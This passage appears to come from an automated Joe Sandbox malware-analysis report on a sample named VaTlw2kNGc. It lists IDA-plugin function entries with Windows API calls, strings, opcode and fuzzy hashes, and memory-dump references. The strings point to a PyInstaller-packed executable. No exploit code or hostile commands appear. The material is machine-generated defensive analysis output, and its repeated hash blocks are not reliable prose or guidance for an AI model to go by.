                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+
                                                                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                    • API String ID: 2943138195-2211150622
                                                                                                    • Opcode ID: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
                                                                                                    • Instruction ID: 076c5fff74ffc01a178469f328f098d03c90abe817e8f858a146097334025b89
                                                                                                    • Opcode Fuzzy Hash: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
                                                                                                    • Instruction Fuzzy Hash: 1F414A72A08F4ACCFB018F66D8402AC7BB0BB28728F444171DA6D6637ADF3CA545C748
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+
                                                                                                    • String ID: char $int $long $short $unsigned
                                                                                                    • API String ID: 2943138195-3894466517
                                                                                                    • Opcode ID: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
                                                                                                    • Instruction ID: 73479b7d9560641004236f9dc9eae077e86501b2da49d0c88ba7b5958bf5234e
                                                                                                    • Opcode Fuzzy Hash: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
                                                                                                    • Instruction Fuzzy Hash: 06416A72A18A56CCF7118F7AE8441BC37B1BB28764F4482B1DE2C62BB9DF389545C708
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                    • String ID:
                                                                                                    • API String ID: 995526605-0
                                                                                                    • Opcode ID: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                                                                    • Instruction ID: 041b1a80ef0167759184ee629d728a1cc03cbf31fc9d6165fdfceecc57fa3b13
                                                                                                    • Opcode Fuzzy Hash: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                                                                    • Instruction Fuzzy Hash: E3212121E0CB43C1EA14AF55B44422AE3B5EB857A4FA40235DA7D43AD8DF7CD9458B10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2506987500-0
                                                                                                    • Opcode ID: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                                    • Instruction ID: ed425afdaccad30083c56d0d0ae6538f45896da75e2566c2c7e2e7f69b4c8335
                                                                                                    • Opcode Fuzzy Hash: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                                    • Instruction Fuzzy Hash: DD213820B4C242C2FA6D7F25B655139E1B35F487B0FB84634E93E46AEEDE2CA5018761
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorFormatLast
                                                                                                    • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                    • API String ID: 3971115935-1149178304
                                                                                                    • Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                                    • Instruction ID: d1a404bb48bdbd6507c22d18f3c0b7c5c183b4c218605dbdeb57b0d5c65fa8aa
                                                                                                    • Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                                    • Instruction Fuzzy Hash: DF216D72608A85C2E724AF11F4402EAB3B4FB88785F900136EACD53A98DF3CD656CB50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                    • String ID: CONOUT$
                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                    • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                    • Instruction ID: 6af52981b5bd93c833f5eb161950a0489024dd7193d3ad3be74a19d3c06ac08f
                                                                                                    • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                    • Instruction Fuzzy Hash: AD118421A18A41C6E7549F12F844329E2B4FB58BE5FA00234DA1E87794DF7CE514CB50
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A821D
                                                                                                    • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A827A
                                                                                                      • Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9
                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A8305
                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A8364
                                                                                                    • FreeLibrary.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A8375
                                                                                                    • FreeLibrary.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A838A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 3462794448-0
                                                                                                    • Opcode ID: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                                                                    • Instruction ID: dc9d47760a3d2ca5b22f3a38d267201b2ff75d67f3b73484d5aa69760eebe8c4
                                                                                                    • Opcode Fuzzy Hash: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                                                                    • Instruction Fuzzy Hash: 68417C72B196C6C2EA64AF12B4042BAA3A4FF85B80F944135DF5D57B89DE3CE801C760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3741236498-0
                                                                                                    • Opcode ID: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
                                                                                                    • Instruction ID: 95331ba962e91b6897781405d6a7c78559e53180b704b7f8b1a809176f030245
                                                                                                    • Opcode Fuzzy Hash: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
                                                                                                    • Instruction Fuzzy Hash: F931E122B19F5188EB118B27A8041AD63A4FF28FF0B6846B5DE3D133A4EE3DD442C344
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF7691A7B50: GetCurrentProcess.KERNEL32 ref: 00007FF7691A7B70
                                                                                                      • Part of subcall function 00007FF7691A7B50: OpenProcessToken.ADVAPI32 ref: 00007FF7691A7B83
                                                                                                      • Part of subcall function 00007FF7691A7B50: GetTokenInformation.ADVAPI32 ref: 00007FF7691A7BA8
                                                                                                      • Part of subcall function 00007FF7691A7B50: GetLastError.KERNEL32 ref: 00007FF7691A7BB2
                                                                                                      • Part of subcall function 00007FF7691A7B50: GetTokenInformation.ADVAPI32 ref: 00007FF7691A7BF2
                                                                                                      • Part of subcall function 00007FF7691A7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7691A7C0E
                                                                                                      • Part of subcall function 00007FF7691A7B50: CloseHandle.KERNEL32 ref: 00007FF7691A7C26
                                                                                                    • LocalFree.KERNEL32(?,00007FF7691A3814), ref: 00007FF7691A848C
                                                                                                    • LocalFree.KERNEL32(?,00007FF7691A3814), ref: 00007FF7691A8495
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                    • API String ID: 6828938-1529539262
                                                                                                    • Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                    • Instruction ID: c9ab67ecba2405bd3707d9f4ccde63262c900cbab63d9f16b4404932f0a0e6fe
                                                                                                    • Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                    • Instruction Fuzzy Hash: 24213031A08685C2F618BF61F4153E9A2B4FB84780FE44436EA4D53B96DF3CD945C760
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA5E7
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA61D
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA64A
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA65B
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA66C
                                                                                                    • SetLastError.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA687
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2506987500-0
                                                                                                    • Opcode ID: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                                                                    • Instruction ID: 57b9157a358bfd0d0d490d7e3e87ab0247492faeb7a1024bb74bf51c514f99b9
                                                                                                    • Opcode Fuzzy Hash: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                                                                    • Instruction Fuzzy Hash: B4113860B48242C2FA5C7F25B651139E2A39F487B0FE44734D83E066EADE2CB5018721
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort$CallEncodePointerTranslator
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 2889003569-2084237596
                                                                                                    • Opcode ID: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
                                                                                                    • Instruction ID: 5d14bb7f7ae126e2c0e8e7936ef9fcc0985c046511a1c4f85e930de763b7b301
                                                                                                    • Opcode Fuzzy Hash: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
                                                                                                    • Instruction Fuzzy Hash: 5F91A273A08B818EE710CB66E8802AE7BA0F7547A8F14417AEF9D27765DF38D195C704
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+
                                                                                                    • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                    • API String ID: 2943138195-757766384
                                                                                                    • Opcode ID: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
                                                                                                    • Instruction ID: 0682f87c3c18d3d479ff9e9da1c76e920fd00e96dce7eacdba13cfdbe7fe842a
                                                                                                    • Opcode Fuzzy Hash: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
                                                                                                    • Instruction Fuzzy Hash: 7B717F71A08E428CEB58CF56D9501BCA7B4BB257A4F4445B5DA6D23AB9DF3CE250C308
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort$CallEncodePointerTranslator
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 2889003569-2084237596
                                                                                                    • Opcode ID: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
                                                                                                    • Instruction ID: 7c840b8be91657f5a40371bd575335ee382201b86d704a9cdd3888d30f102607
                                                                                                    • Opcode Fuzzy Hash: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
                                                                                                    • Instruction Fuzzy Hash: 19616936A08F858AE714CF66D0803AE77A0FB54BA8F144165EF5D23B68CF78E055C708
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                    • String ID: Unhandled exception in script
                                                                                                    • API String ID: 3081866767-2699770090
                                                                                                    • Opcode ID: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
                                                                                                    • Instruction ID: 7c90c80c26d2125f04316e98079a1f0a0b782f63b25dc51a241941874907bbbd
                                                                                                    • Opcode Fuzzy Hash: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
                                                                                                    • Instruction Fuzzy Hash: 34313D32A09A86C9EB28AF61F8552F9A370FF88794F940135EA4D47B59DF3CD505C710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ByteCharMultiWide
                                                                                                    • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                    • API String ID: 1878133881-640379615
                                                                                                    • Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                                                    • Instruction ID: 709f9a6250ef0c4ef748471060b9daa144d28ff9e2375aa63cf738b83d15f031
                                                                                                    • Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                                                    • Instruction Fuzzy Hash: 83216B72628AC6C2E624AF10F4517EAA374FF84784F905136EA8C43A99DF3CD646CB50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                    • Instruction ID: 3f23797772a02f4b2cd3ab0a2a3c6c4da112c766718274bdefd701c5b0b3b59e
                                                                                                    • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                    • Instruction Fuzzy Hash: 52F06221B19702C2EA18AF24F4443799330AF49B61FE40636C96E862F4CF2CD04AC720
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameName::$Name::operator+
                                                                                                    • String ID:
                                                                                                    • API String ID: 826178784-0
                                                                                                    • Opcode ID: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
                                                                                                    • Instruction ID: 7cb61d355a5f40449ad77c13eff0d40855d6e504d61ebdd8f5c1303e3e6f3e96
                                                                                                    • Opcode Fuzzy Hash: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
                                                                                                    • Instruction Fuzzy Hash: EA415C32A08E5688F710CB62E9801BC33B4BB25BA0B5445B2DA6D637B5DF3CE956C304
                                                                                                    APIs
                                                                                                    Memory Dump Source
